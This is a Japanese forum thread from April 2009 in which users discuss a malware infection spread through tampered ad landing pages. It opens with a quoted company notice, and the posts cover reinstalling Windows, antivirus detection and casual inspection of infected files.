この度、ECナビサイトにて掲載を行っておりました広告にてリンク先ページが
改ざんされた可能性があり、広告をクリックして遷移先ページを閲覧した
ご利用者様がウイルスに感染した可能性があるという事態が発生しました。
なお、対象となる広告は下記となります。
■対象広告
puppine(株式会社ブランジスタ)
■掲載期間、箇所
【4/2〜4/9 ポイントチャンス!】
://ecnavi.jp/frame/?url=http%3A%2F%2Fkensho.ecnavi.jp%2Fsearch%2F&KID=&search=&order=new
愛犬と一緒に楽しめる最新ライフスタイル情報が満載「puppine」
【4/9〜4/10 宝くじ ガラガラでポン!】
://point.ecnavi.jp/campaign/lottery/game/
ペットとわたしの新感覚ウェブマガジン「puppine」
※ECナビでは上記の危険認識により、4月10日 15時に広告掲載を停止いたしました。
今回のウィルスに関しましては、Flash/Adobe Readerの既知の脆弱性を悪用するもので、
最新版をお使いならば感染の危険がないという情報もございます。
しかしながら、被害状況等の詳細に関しましては現在掲載サイトにて確認を行っております。
状況が分かり次第再度ご報告させていただきますので、
今しばらくお待ちくださいますようお願いいたします。
960 : ◆W07s5cWHb. :2009/04/10(金) 19:41:39
>>955
DAPのスレって?
DAPのスレって?
961 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:43:02
そのコテの人の知識は役に立つ
ただ自分語りは控えていただきたい
ただ自分語りは控えていただきたい
962 : ◆W07s5cWHb. :2009/04/10(金) 19:44:06
>>961
すまんな。
すまんな。
963 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:46:34
964 :ハッカー大西 ◆LPbKkZKP8Q :2009/04/10(金) 19:49:53
逆アセンブル(?)ってやつやってやってもいいけど
965 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:51:53
>>964
お前おもしろいなw
お前おもしろいなw
966 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:53:44
>>964
お前まだいたのかw
お前まだいたのかw
967 :g0d0fH4ck大西 ◆LPbKkZKP8Q :2009/04/10(金) 19:57:21
968 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:58:14
逆逆アセンブリまであとどんくらい?
969 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:58:51
>>967
どうやって逆アセンブルやるんですか?
どうやって逆アセンブルやるんですか?
970 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:59:41
今回の騒ぎでクリーンインスト3台やった俺が来ましたよっと。
クリーンインストのおかげで3台共動きが軽快。
ただし四日間かかったけど。
何がブラウザキャッシュをクリアだ。ふざけんな。
クリーンインストのおかげで3台共動きが軽快。
ただし四日間かかったけど。
何がブラウザキャッシュをクリアだ。ふざけんな。
971 :ハッカー大西 ◆LPbKkZKP8Q :2009/04/10(金) 20:00:44
>>968
大体わかってきた。
どうやらあらゆるプロセスを乗っ取るらしい
>>969
俺は今改造されたsqlsodbc.chmを逆アセンブルでしらべてるんだけど
やり方は、
スタートからアクセサリでメモ帳を開きそこに、sqlsodbc.chmをドロップアンドドラッグする。
そうすると文字列が出てくるだろ?
大体わかってきた。
どうやらあらゆるプロセスを乗っ取るらしい
>>969
俺は今改造されたsqlsodbc.chmを逆アセンブルでしらべてるんだけど
やり方は、
スタートからアクセサリでメモ帳を開きそこに、sqlsodbc.chmをドロップアンドドラッグする。
そうすると文字列が出てくるだろ?
972 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:02:52
973 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:03:44
974 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:05:13
大西だったらν速から来た基地外の方がまし
975 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:06:08
976 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:07:48
コモドとかHIPS入ってるならそれより前の段階で防げるよ
977 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:07:54
>>971
コードはなに語で書かれてる?
コードはなに語で書かれてる?
978 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:08:59
>>973
てかそれより前の段階で防げるよ
てかそれより前の段階で防げるよ
979 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:10:44
980 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:23
ν速の方のすれってまだあるの?
981 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:23
リバエンするって言うもんだから(ry
982 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:14:59
983 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:15:32
俺は再インスコするのが面倒だからアンチウィルスソフトで検出されたマルウェア等を片っ端から削除した。
sqlsodbc.chmも改竄されてたので一旦削除してから、クリーンな別PCからソレを移植した。
まぁ一応平穏な状態には戻った。
sqlsodbc.chmも改竄されてたので一旦削除してから、クリーンな別PCからソレを移植した。
まぁ一応平穏な状態には戻った。
984 : ◆W07s5cWHb. :2009/04/10(金) 20:17:16
>>980
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
985 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:18:55
>>980
もうグダグダで覗く価値なし
もうグダグダで覗く価値なし
986 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:20:25
いえーい!
再インスコした俺が通るよwwww
それで、フルスキャンで検知→駆除はできるようになったの??
再インスコした俺が通るよwwww
それで、フルスキャンで検知→駆除はできるようになったの??
987 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:23:46
次スレは?
988 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:29:56
>前の段階って何?
感染直前の段階、ぜい弱性をついて感染を試みるこの段階で警告がでるはず
>それで、フルスキャンで検知→駆除はできるようになったの??
AntiVirだけ感染後ドロップされる一つファイルを検知できる
検知、駆除以前にドロップするファイル数がこのウイルスは極端に少ない、
ウイルスの動きが把握し切れてないので完全に駆除できたとは言い切れない
よくて症状が治った程度
感染直前の段階、ぜい弱性をついて感染を試みるこの段階で警告がでるはず
>それで、フルスキャンで検知→駆除はできるようになったの??
AntiVirだけ感染後ドロップされる一つファイルを検知できる
検知、駆除以前にドロップするファイル数がこのウイルスは極端に少ない、
ウイルスの動きが把握し切れてないので完全に駆除できたとは言い切れない
よくて症状が治った程度
989 : ◆W07s5cWHb. :2009/04/10(金) 20:32:05
>>977
おいらはプログラマじゃないんで細かい事は判らないけど、
UPX圧縮を解除したLa.exeなら今ノートン先生の検疫から戻してバイナリエディタで開いてる。
ファイルの最後に空っぽのVSVersionInfoが在るからどー見てもVC系で作られたEXEだな。
確約出来ないけど。
証拠の画像
ttp://www1.axfc.net/uploader/Img/so/42510.jpg
おいらはプログラマじゃないんで細かい事は判らないけど、
UPX圧縮を解除したLa.exeなら今ノートン先生の検疫から戻してバイナリエディタで開いてる。
ファイルの最後に空っぽのVSVersionInfoが在るからどー見てもVC系で作られたEXEだな。
確約出来ないけど。
証拠の画像
ttp://www1.axfc.net/uploader/Img/so/42510.jpg
990 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:32:46
>>988
サンクス、もうしばらく注意必要って事ね。
サンクス、もうしばらく注意必要って事ね。
991 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:33:50
992 : ◆W07s5cWHb. :2009/04/10(金) 20:36:32
あ、選んだロダがアレだったな。
専用ブラでもプレビュー出来ないし、ちと開くのが怖いな。、これだと。
専用ブラでもプレビュー出来ないし、ちと開くのが怖いな。、これだと。
993 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:36:52
994 : ◆W07s5cWHb. :2009/04/10(金) 20:38:05
あ、意味分かった
頓珍漢なこと聞いて済まなかった
頓珍漢なこと聞いて済まなかった
996 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:38:59
997 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:42:27
次すれ立ててもこれ以上結論出そうにない
998 : ◆W07s5cWHb. :2009/04/10(金) 20:42:44
>>996
どもども。
どもども。
999 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:43:38
本スレ統合っえことでおk?
1000 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:45:17
次スレ誰か立ててくれ
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。